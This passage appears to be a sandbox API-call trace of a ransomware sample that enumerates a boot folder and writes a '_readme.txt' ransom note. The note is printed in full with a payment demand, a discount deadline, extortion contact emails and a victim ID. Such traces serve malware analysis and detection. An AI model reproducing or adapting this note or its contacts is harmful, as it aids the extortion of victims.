0x2d277c0 [0174.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.635] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0174.635] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.635] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.635] PathFindFileNameW (pszPath="") returned="" [0174.635] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.636] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.636] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.636] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.637] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0174.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.637] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0174.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.638] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.638] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.638] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.640] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*" (normalized: "c:\\boot\\fr-fr\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.640] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.641] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.641] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.641] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.642] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.659] 